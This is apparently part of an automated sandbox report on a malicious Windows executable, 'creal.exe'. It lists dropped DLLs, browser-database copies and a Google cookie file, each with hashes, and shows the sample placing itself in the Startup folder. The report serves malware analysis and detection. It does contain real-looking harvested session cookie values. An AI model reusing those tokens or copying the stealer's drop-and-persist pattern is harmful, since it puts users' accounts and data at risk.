                                                                                                                                                                                                              SHA1:502F95DA3089549E19C451737AA262E45C5BC3BC
                                                                                                                                                                                                              SHA-256:A2241587FE4F9D033413780F762CF4F5608D9B08870CC6867ABFDE96A0777283
                                                                                                                                                                                                              SHA-512:A0BA37A0B2F3D4AE1EE2B09BB13ED20912DB4E6A009FE9BA9414830AD4FDBF58571E195ABBE0D19F5582E2CF958CFB49FFDACD7C5182008699F92A0F5EEC6C41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                              Entropy (8bit):3.536886723742169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                              MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                              SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                              SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                              SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:importlib_metadata.
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5162776
                                                                                                                                                                                                              Entropy (8bit):5.958207976652471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:S3+FRtLtlVriXpshX179Cahd4tC9P1+1CPwDvt3uFlDCi:ASRtLtvd99Cahd4tC9w1CPwDvt3uFlDz
                                                                                                                                                                                                              MD5:51E8A5281C2092E45D8C97FBDBF39560
                                                                                                                                                                                                              SHA1:C499C810ED83AAADCE3B267807E593EC6B121211
                                                                                                                                                                                                              SHA-256:2A234B5AA20C3FAECF725BBB54FB33F3D94543F78FA7045408E905593E49960A
                                                                                                                                                                                                              SHA-512:98B91719B0975CB38D3B3C7B6F820D184EF1B64D38AD8515BE0B8B07730E2272376B9E51631FE9EFD9B8A1709FEA214CF3F77B34EEB9FD282EB09E395120E7CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39696
                                                                                                                                                                                                              Entropy (8bit):6.641880464695502
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                              MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                              SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                              SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                              SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):790296
                                                                                                                                                                                                              Entropy (8bit):5.607732992846443
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:7aO1lo7USZGjweMMHO4+xuVg7gCl2VdhMd1DdwMVn4TERUr3zgKpJJ/wknofFe9A:FkeMKOr97gCAE35gEGzLpwknofFe9XbE
                                                                                                                                                                                                              MD5:BFC834BB2310DDF01BE9AD9CFF7C2A41
                                                                                                                                                                                                              SHA1:FB1D601B4FCB29FF1B13B0D2ED7119BD0472205C
                                                                                                                                                                                                              SHA-256:41AD1A04CA27A7959579E87FBBDA87C93099616A64A0E66260C983381C5570D1
                                                                                                                                                                                                              SHA-512:6AF473C7C0997F2847EBE7CEE8EF67CD682DEE41720D4F268964330B449BA71398FDA8954524F9A97CC4CDF9893B8BDC7A1CF40E9E45A73F4F35A37F31C6A9C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):199448
                                                                                                                                                                                                              Entropy (8bit):6.385306498353421
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:jJB/b2LOWs5LS04q1uqtF+ai7dYbmdRLjDxKyw6XUWdRBIpLhCujk:dB6yx5LT1gqtF+XGeL/xiBoR4g
                                                                                                                                                                                                              MD5:E2D1C738D6D24A6DD86247D105318576
                                                                                                                                                                                                              SHA1:384198F20724E4EDE9E7B68E2D50883C664EEE49
                                                                                                                                                                                                              SHA-256:CDC09FBAE2F103196215FACD50D108BE3EFF60C8EE5795DCC80BF57A0F120CDF
                                                                                                                                                                                                              SHA-512:3F9CB64B4456438DEA82A0638E977F233FAF0A08433F01CA87BA65C7E80B0680B0EC3009FA146F02AE1FDCC56271A66D99855D222E77B59A1713CAF952A807DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68376
                                                                                                                                                                                                              Entropy (8bit):6.148687003588085
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:/BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM8:pDmF61JFn+/OJBIpL0j7Sy5xH
                                                                                                                                                                                                              MD5:4038AF0427BCE296CA8F3E98591E0723
                                                                                                                                                                                                              SHA1:B2975225721959D87996454D049E6D878994CBF2
                                                                                                                                                                                                              SHA-256:A5BB3EB6FDFD23E0D8B2E4BCCD6016290C013389E06DAAE6CB83964FA69E2A4F
                                                                                                                                                                                                              SHA-512:DB762442C6355512625B36F112ECA6923875D10AAF6476D79DC6F6FFC9114E8C7757AC91DBCD1FB00014122BC7F656115160CF5D62FA7FA1BA70BC71346C1AD3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7003928
                                                                                                                                                                                                              Entropy (8bit):5.780799677504345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:98304:2OUmnjqB6bHMYM3RNgqKutvDHDMiEtYkzuv:2OUmn+MnM3R+qYi3kzuv
                                                                                                                                                                                                              MD5:48EBFEFA21B480A9B0DBFC3364E1D066
                                                                                                                                                                                                              SHA1:B44A3A9B8C585B30897DDC2E4249DFCFD07B700A
                                                                                                                                                                                                              SHA-256:0CC4E557972488EB99EA4AEB3D29F3ADE974EF3BCD47C211911489A189A0B6F2
                                                                                                                                                                                                              SHA-512:4E6194F1C55B82EE41743B35D749F5D92A955B219DECACF9F1396D983E0F92AE02089C7F84A2B8296A3062AFA3F9C220DA9B7CD9ED01B3315EA4A953B4ECC6CE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                              Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                              MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                              SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                              SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                              SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30488
                                                                                                                                                                                                              Entropy (8bit):6.584443317757654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:OyLTFInPLnIloHqP3DT90IBIpQG28HQIYiSy1pCQ5mrUAM+o/8E9VF0NyOYl:hinzfHqv1rBIpQG/5YiSyvkrUAMxkErl
                                                                                                                                                                                                              MD5:E1604AFE8244E1CE4C316C64EA3AA173
                                                                                                                                                                                                              SHA1:99704D2C0FA2687997381B65FF3B1B7194220A73
                                                                                                                                                                                                              SHA-256:74CCA85600E7C17EA6532B54842E26D3CAE9181287CDF5A4A3C50AF4DAB785E5
                                                                                                                                                                                                              SHA-512:7BF35B1A9DA9F1660F238C2959B3693B7D9D2DA40CF42C6F9EBA2164B73047340D0ADFF8995049A2FE14E149EBA05A5974EEE153BADD9E8450F961207F0B3D42
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1500440
                                                                                                                                                                                                              Entropy (8bit):6.5886408023548295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24576:ATqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFq++I:nk0jwv4tP5kf8ar/74EF2/An4acrVUc2
                                                                                                                                                                                                              MD5:31CD2695493E9B0669D7361D92D46D94
                                                                                                                                                                                                              SHA1:19C1BC5C3856665ECA5390A2F9CD59B564C0139B
                                                                                                                                                                                                              SHA-256:17D547994008F1626BE2877497912687CB3EBD9A407396804310FD12C85AEAD4
                                                                                                                                                                                                              SHA-512:9DD8D1B900999E8CEA91F3D5F3F72D510F9CC28D7C6768A4046A9D2AA9E78A6ACE1248EC9574F5F6E53A6F1BDBFDF153D9BF73DBA05788625B03398716C87E1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1137944
                                                                                                                                                                                                              Entropy (8bit):5.4622357236004175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:PrEHdcM6hb1CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciA0:PrEXQCjfk7bPNfv42BN6yzUiA0
                                                                                                                                                                                                              MD5:FC47B9E23DDF2C128E3569A622868DBE
                                                                                                                                                                                                              SHA1:2814643B70847B496CBDA990F6442D8FF4F0CB09
                                                                                                                                                                                                              SHA-256:2A50D629895A05B10A262ACF333E7A4A31DB5CB035B70D14D1A4BE1C3E27D309
                                                                                                                                                                                                              SHA-512:7C08683820498FDFF5F1703DB4AD94AD15F2AA877D044EDDC4B54D90E7DC162F48B22828CD577C9BB1B56F7C11F777F9785A9DA1867BF8C0F2B6E75DC57C3F53
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):133632
                                                                                                                                                                                                              Entropy (8bit):5.851293297484796
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
                                                                                                                                                                                                              MD5:3A80FEA23A007B42CEF8E375FC73AD40
                                                                                                                                                                                                              SHA1:04319F7552EA968E2421C3936C3A9EE6F9CF30B2
                                                                                                                                                                                                              SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                                                                                              SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):275
                                                                                                                                                                                                              Entropy (8bit):5.83018576654272
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Pk3rocHDyzxbyv3rocHDKJmJcrDSLukrTSSIGDRmEksDVD:c79EI798HSLLXAGDR+U
                                                                                                                                                                                                              MD5:58DA1C4E7D7343D729004021FFAE7C6A
                                                                                                                                                                                                              SHA1:6BE741E07C443633796C4194E8DA13CE00D29ACE
                                                                                                                                                                                                              SHA-256:C17B0513E4A8C848E478FC56778F7152516D7A32F68A3B6CB3CD44B33676CDB0
                                                                                                                                                                                                              SHA-512:13006D75D500FC455D3E2B26D4C4D8DEF694F73F0A20A01CC5D2C24C2BAA2019F503AEA0DBD8F096F97B8F52F5779AF746FEFCBB60AEE6A83FD71B2CE3C8CC1A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-09...google.com.TRUE./.FALSE.2597573456.NID.511=k9tT3q7Yfh1nx_FSl06F5UE_vdaFQreiGKe1aDN83MeveD7PL1RZXva4s-nFc9waQi9LtKavuTIba8MUkoGu58E8E81gwB_TWJ4Ng-LfCvzhem7rNrhZQ2aGvJZ9g2TYhqx2W2O4E7uHQzPk3vuLvMLxFXZsqE6NdAViQDECGpo..
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                              MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                              SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                              SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                              SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                              MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                              SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                              SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                              SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                              Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                              Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17171619
                                                                                                                                                                                                              Entropy (8bit):7.99668685845339
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:393216:uEkMDn78nxpUTLfhJuW+eGQRCMTozGxu8C0ibfz6e57xeBOxImR07KWHOcpd:uUDn87UTLJ4W+e5RLoztZ026e5VeM2KM
                                                                                                                                                                                                              MD5:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              SHA1:884C5B84185BFCC06B2F82474642E23AF842CF26
                                                                                                                                                                                                              SHA-256:7166D6CC2435061F32CF982DBA8F6EC27FC23A46C9705AA52FB2BA08EB7011AA
                                                                                                                                                                                                              SHA-512:8D0538DEF7BF8B993F812BDBEDF3AA445637FF66746B1A041B491FBDD0E707356C2331AA56625A5C40D0CE6079CC0E9A30C9A2DE65B002027E37F2CED24C72AF
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):7.99668685845339
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                              • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                              File name:creal.exe
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5:da1695dba8bd25d00e05e7769d6d7e8e
                                                                                                                                                                                                              SHA1:884c5b84185bfcc06b2f82474642e23af842cf26
                                                                                                                                                                                                              SHA256:7166d6cc2435061f32cf982dba8f6ec27fc23a46c9705aa52fb2ba08eb7011aa
                                                                                                                                                                                                              SHA512:8d0538def7bf8b993f812bdbedf3aa445637ff66746b1a041b491fbdd0e707356c2331aa56625a5c40d0ce6079cc0e9a30c9a2de65b002027e37f2ced24c72af
                                                                                                                                                                                                              SSDEEP:393216:uEkMDn78nxpUTLfhJuW+eGQRCMTozGxu8C0ibfz6e57xeBOxImR07KWHOcpd:uUDn87UTLJ4W+e5RLoztZ026e5VeM2KM
                                                                                                                                                                                                              TLSH:6A073346929008B2F6E1D1389516C97BF732B0100754E2BF1775B2292FBB3535E3DBAA
                                                                                                                                                                                                              Icon Hash:4a464cd47461e179
